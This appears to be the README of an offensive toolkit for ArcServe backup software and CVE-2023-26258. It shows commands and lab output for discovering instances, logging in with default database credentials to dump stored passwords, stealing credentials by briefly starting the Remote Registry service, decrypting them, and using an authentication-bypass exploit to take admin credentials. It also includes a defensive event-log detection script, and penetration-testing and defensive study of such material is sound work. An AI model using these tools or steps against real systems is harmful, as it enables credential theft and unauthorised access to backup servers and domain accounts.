mdsecactivebreach / CVE-2023-26258-ArcServe

The TL;DR

If you are on the network, you can scan for ArcServe instances running with the default configuration using ArcServeRadar.py. I tried to port it to C# but couldn't; feel free to do it if you know how :)

c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20
                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-


[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
        [+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;

If the instance still uses the default configuration, you can connect with the default DB credentials to the IP and port obtained above and read the stored username/password, plus the locations of the ArcServe instances, using ArcServe-dbpwner.py:

psyconauta@insulanova:/tmp|⇒  python3 arcserve-dbpwner.py -target 192.168.56.10 -port 62197
		-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-


[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL


 Have a nice day! ^_^

All passwords retrieved by these tools can be decrypted with ArcServeDecrypter.exe: edit the C source to add the byte array, compile it and run it:

C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant

If you have a user with local admin privileges on the server where ArcServe is installed, you can read the credentials through the Remote Registry service (arcserve-regkeys.py):

psyconauta@insulanova:/tmp|⇒  python3 arcserve-regkeys.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
		-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
	[*] User: P3TWLADS11STD\vagrant
	[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^
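Defender-side check, added here and not part of the repository's own code: the start, read, stop sequence shown above leaves Service Control Manager event 7036 entries ("The X service entered the Y state.") in the Windows System log, so a Remote Registry service that is alive for only a few seconds is a useful hunting signal. The log lines below are constructed samples, and the 60-second window is an assumed threshold.

```python
import re
from datetime import datetime

# Constructed sample of System-log 7036 messages as (timestamp, message).
# Not real telemetry; the text mirrors the SCM message format.
SAMPLE_EVENTS = [
    ("2023-06-28 10:01:05", "The Remote Registry service entered the running state."),
    ("2023-06-28 10:01:09", "The Remote Registry service entered the stopped state."),
    ("2023-06-28 12:30:00", "The Windows Update service entered the running state."),
    ("2023-06-28 13:00:00", "The Remote Registry service entered the running state."),
    ("2023-06-28 15:00:00", "The Remote Registry service entered the stopped state."),
]

_7036 = re.compile(r"The (.+) service entered the (\w+) state\.")


def parse_7036(timestamp: str, message: str):
    """Return (time, service, state) or None if not a 7036 transition message."""
    m = _7036.fullmatch(message)
    if not m:
        return None
    return datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S"), m.group(1), m.group(2)


def find_short_lived_runs(events, service="Remote Registry", max_seconds=60):
    """Pair each 'running' event of `service` with the next 'stopped' event
    and return (start, stop, lifetime_seconds) for runs lasting at most
    max_seconds. A normal, persistently enabled service never produces these."""
    hits = []
    started = None
    for ts, msg in sorted(events):  # timestamps sort lexically in this format
        parsed = parse_7036(ts, msg)
        if parsed is None or parsed[1] != service:
            continue
        when, _, state = parsed
        if state == "running":
            started = when
        elif state == "stopped" and started is not None:
            lifetime = (when - started).total_seconds()
            if lifetime <= max_seconds:
                hits.append((started, when, lifetime))
            started = None
    return hits


if __name__ == "__main__":
    for start, stop, secs in find_short_lived_runs(SAMPLE_EVENTS):
        print(f"[!] Remote Registry ran for {secs:.0f}s ({start} -> {stop})")
```

Correlating a hit with a logon event (4624) from a remote host in the same window narrows it further; mitigation is keeping Remote Registry disabled and restricting who holds local admin on the ArcServe server.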

Finally, if the ArcServe version was not patched against CVE-2023-26258, you can exploit an authentication bypass in the management web interface and retrieve the admin credentials (ArcServe-exploit.py):

psyconauta@insulanova:/tmp|⇒  python3 ArcServe-exploit.py 192.168.56.10
		-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-


[*] Triggering info leak
	[+] AdminName: SEVENKINGDOMS\vagrant
	[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
	[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
	[+] Admin: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter


Have a happy hacking! ^_^

This concludes the summary of the tools you can find in this repository.
